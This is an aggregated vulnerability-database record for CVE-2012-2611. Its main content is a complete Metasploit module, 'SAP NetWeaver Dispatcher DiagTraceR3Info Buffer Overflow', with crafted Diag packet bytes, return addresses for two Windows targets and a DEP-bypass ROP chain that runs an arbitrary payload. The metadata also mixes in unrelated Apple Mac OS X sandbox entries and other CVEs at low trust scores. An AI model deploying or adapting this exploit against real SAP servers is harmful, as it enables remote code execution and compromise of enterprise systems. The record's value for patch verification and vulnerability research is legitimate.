ID
VAR-E-201111-0154
CVE
| cve_id: | CVE-2012-2611 | Trust: 2.4 |
| cve_id: | CVE-2011-1516 | Trust: 1.3 |
| cve_id: | CVE-2012-2512 | Trust: 0.8 |
| cve_id: | CVE-2012-2511 | Trust: 0.8 |
| cve_id: | CVE-2012-2514 | Trust: 0.8 |
| cve_id: | CVE-2012-2513 | Trust: 0.8 |
| cve_id: | CVE-2011-1517 | Trust: 0.5 |
| cve_id: | CVE-2012-2612 | Trust: 0.3 |
EDB ID
21034
TITLE
SAP NetWeaver Dispatcher - DiagTraceR3Info Buffer Overflow (Metasploit) - Windows remote Exploit
Trust: 0.6
DESCRIPTION
SAP NetWeaver Dispatcher - DiagTraceR3Info Buffer Overflow (Metasploit). CVE-2012-2611CVE-81759 . remote exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | sap | model: | netweaver dispatcher | scope: | - | version: | - | Trust: 1.0 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.6.5 | Trust: 0.6 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5 | Trust: 0.6 |
| vendor: | sap | model: | netweaver ehp1/ehp2 | scope: | eq | version: | 7.0 | Trust: 0.5 |
| vendor: | sap | model: | netweaver dispatcher diagtracer3info | scope: | - | version: | - | Trust: 0.5 |
| vendor: | apple | model: | os sandbox predefined profiles | scope: | eq | version: | x | Trust: 0.5 |
| vendor: | sap | model: | netweaver ehp2 | scope: | eq | version: | 7.0 | Trust: 0.3 |
| vendor: | sap | model: | netweaver ehp1 | scope: | eq | version: | 7.0 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.6.6 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.6.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.6.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.6.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.6.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.8 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.7 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.6 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.5 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.7.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.7.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.7 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.6.8 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.6.7 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.6 | Trust: 0.3 |
EXPLOIT
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the SAP NetWeaver Dispatcher
service. The overflow occurs in the DiagTraceR3Info() function and allows a remote
attacker to execute arbitrary code by supplying a special crafted Diag packet. The
Dispatcher service is only vulnerable if the Developer Traces have been configured
at levels 2 or 3. The module has been successfully tested on SAP Netweaver 7.0 EHP2
SP6 over Windows XP SP3 and Windows 2003 SP2 (DEP bypass).
},
'Author' => [
'Martin Gallo', # Vulnerability discovery and PoC
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'OSVDB', '81759' ],
[ 'CVE', '2012-2611' ],
[ 'BID', '53424' ],
[ 'EDB', '20705' ],
[ 'URL', 'http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities'],
[ 'URL', 'http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=Uncovering_SAP_vulnerabilities_reversing_and_breaking_the_Diag_protocol']
],
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
'EXITFUNC' => 'process'
},
'Payload' =>
{
'Space' => 4000,
'BadChars' => "\x00",
'DisableNops' => true,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'Platform' => 'win',
'Targets' =>
[
# disp+work.exe version 7200.70.18.23869
[
'SAP Netweaver 7.0 EHP2 SP6 / Windows XP SP3',
{
'Ret' => 0x5f7a # 0x005f007a # call ebx from disp+work.EXE
}
],
[
'SAP Netweaver 7.0 EHP2 SP6 / Windows 2003 SP2',
{
'Ret' => 0x77bde7f6 # {pivot 44} # ADD ESP,2C # RETN from msvcrt.dll
}
]
],
'Privileged' => false,
'DefaultTarget' => 1,
'DisclosureDate' => 'May 8 2012'))
register_options([Opt::RPORT(3200)], self.class)
end
def create_rop_chain()
# ROP chains provided by Corelan.be
# https://www.corelan.be/index.php/security/corelan-ropdb/#msvcrtdll_8211_v7037903959_Windows_2003_SP1_SP2
rop_gadgets =
[
0x77bb2563, # POP EAX # RETN
0x77ba1114, # <- *&VirtualProtect()
0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
0x41414141, #junk
0x77bb0c86, # XCHG EAX,ESI # RETN
0x77bc9801, # POP EBP # RETN
0x77be2265, # ptr to 'push esp # ret'
0x77bb2563, # POP EAX # RETN
0x03C0A40F,
0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)
0x77bb48d3, # POP EBX, RET
0x77bf21e0, # .data
0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
0x77bbfc02, # POP ECX # RETN
0x77bef001, # W pointer (lpOldProtect) (-> ecx)
0x77bd8c04, # POP EDI # RETN
0x77bd8c05, # ROP NOP (-> edi)
0x77bb2563, # POP EAX # RETN
0x03c0984f,
0x77bdd441, # SUB EAX, 03c0940f
0x77bb8285, # XCHG EAX,EDX # RETN
0x77bb2563, # POP EAX # RETN
0x90909090,#nop
0x77be6591, # PUSHAD # ADD AL,0EF # RETN
].pack("V*")
return rop_gadgets
end
def exploit
peer = "#{rhost}:#{rport}"
connect
# initialize
diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00"
user_connect = "\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8"
support_data = "\x10\x04\x0b\x00\x20"
support_data << "\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93"
support_data << "\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00"
dpheader = "\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff"
dpheader << "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
dpheader << [diagheader.length + user_connect.length + support_data.length].pack("V")
dpheader << "\x00\xff\xff\xff\xff\xff\xff\x20\x20\x20\x20\x20\x20\x20\x20\x20"
dpheader << "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
dpheader << "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
dpheader << "terminalXXXXXXX"
dpheader << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x20\x20\x20\x20\x20"
dpheader << "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x00\x00"
dpheader << "\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00"
dpheader << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
dpheader << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
dpheader << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
dpheader << "\x00\x00\x00\x00\x00\x00\x00\x00"
pkt = [dpheader.length + diagheader.length + user_connect.length + support_data.length].pack("N")
pkt << dpheader
pkt << diagheader
pkt << user_connect
pkt << support_data
print_status("#{peer} - Sending initialize packet to the SAP Dispatcher")
sock.put(pkt)
res = sock.get_once(-1)
if not res
print_error("#{peer} - The connection with the Dispatcher has not been initialized")
return
end
# send message
if target.name =~ /Windows XP SP3/
crash = make_nops(112)
crash << "\xeb\x02" # jmp over call pointer
crash << [target.ret].pack("v")
crash << make_nops(10) * 200
crash << payload.encoded
else # Windows 2003
crash = "C\x00" # Avoid "UNICODE" conversion when copying data to stack
crash << rand_text(2) # padding
crash << [0x77bd7d82].pack("V") * 55 # <== after stackpivoting esp points here # "ret" ROP nop from msvcrt
crash << [0x77bdf0da].pack("V") # pop eax # ret from msvcrt
crash << [target.ret].pack("V") # stackpivot
crash << create_rop_chain
crash << payload.encoded
end
print_status("#{peer} - Sending crafted message")
message = "\x10\x06\x20" + [crash.length].pack("n") + crash
diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00"
step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01"
eom = "\x0c"
pkt = [diagheader.length + step.length + message.length + eom.length].pack("N")
pkt << diagheader
pkt << step
pkt << message
pkt << eom
sock.put(pkt)
disconnect
end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
DiagTraceR3Info Buffer Overflow (Metasploit)
Trust: 1.0
TAGS
| tag: | exploit | Trust: 1.5 |
| tag: | remote | Trust: 1.0 |
| tag: | arbitrary | Trust: 1.0 |
| tag: | Metasploit Framework (MSF) | Trust: 1.0 |
| tag: | denial of service | Trust: 0.5 |
| tag: | tcp | Trust: 0.5 |
| tag: | vulnerability | Trust: 0.5 |
| tag: | overflow | Trust: 0.5 |
| tag: | bypass | Trust: 0.5 |
CREDITS
Metasploit
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2012-2611 | Trust: 2.4 |
| db: | EXPLOIT-DB | id: | 21034 | Trust: 1.6 |
| db: | NVD | id: | CVE-2011-1516 | Trust: 1.3 |
| db: | NVD | id: | CVE-2012-2512 | Trust: 0.8 |
| db: | NVD | id: | CVE-2012-2511 | Trust: 0.8 |
| db: | NVD | id: | CVE-2012-2514 | Trust: 0.8 |
| db: | NVD | id: | CVE-2012-2513 | Trust: 0.8 |
| db: | EDBNET | id: | 43145 | Trust: 0.6 |
| db: | NVD | id: | CVE-2011-1517 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 112538 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 116161 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 106850 | Trust: 0.5 |
| db: | NVD | id: | CVE-2012-2612 | Trust: 0.3 |
| db: | BID | id: | 53424 | Trust: 0.3 |
| db: | BID | id: | 50644 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2012-2611 | Trust: 2.1 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2011-1516 | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/21034/ | Trust: 0.6 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2012-2514 | Trust: 0.5 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2012-2513 | Trust: 0.5 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2012-2511 | Trust: 0.5 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2011-1517 | Trust: 0.5 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2012-2512 | Trust: 0.5 |
| url: | http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities | Trust: 0.3 |
| url: | http://www.sap.com/platform/netweaver/index.epx | Trust: 0.3 |
| url: | http://www.apple.com/macosx/ | Trust: 0.3 |
| url: | http://www.coresecurity.com/content/apple-osx-sandbox-bypass | Trust: 0.3 |
SOURCES
| db: | BID | id: | 53424 |
| db: | BID | id: | 50644 |
| db: | PACKETSTORM | id: | 112538 |
| db: | PACKETSTORM | id: | 116161 |
| db: | PACKETSTORM | id: | 106850 |
| db: | EXPLOIT-DB | id: | 21034 |
| db: | EDBNET | id: | 43145 |
LAST UPDATE DATE
2022-07-27T09:35:46.556000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 53424 | date: | 2012-09-04T05:50:00 |
| db: | BID | id: | 50644 | date: | 2011-11-10T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 53424 | date: | 2012-05-08T00:00:00 |
| db: | BID | id: | 50644 | date: | 2011-11-10T00:00:00 |
| db: | PACKETSTORM | id: | 112538 | date: | 2012-05-08T15:15:15 |
| db: | PACKETSTORM | id: | 116161 | date: | 2012-09-03T23:05:48 |
| db: | PACKETSTORM | id: | 106850 | date: | 2011-11-11T03:11:55 |
| db: | EXPLOIT-DB | id: | 21034 | date: | 2012-09-07T00:00:00 |
| db: | EDBNET | id: | 43145 | date: | 2012-09-07T00:00:00 |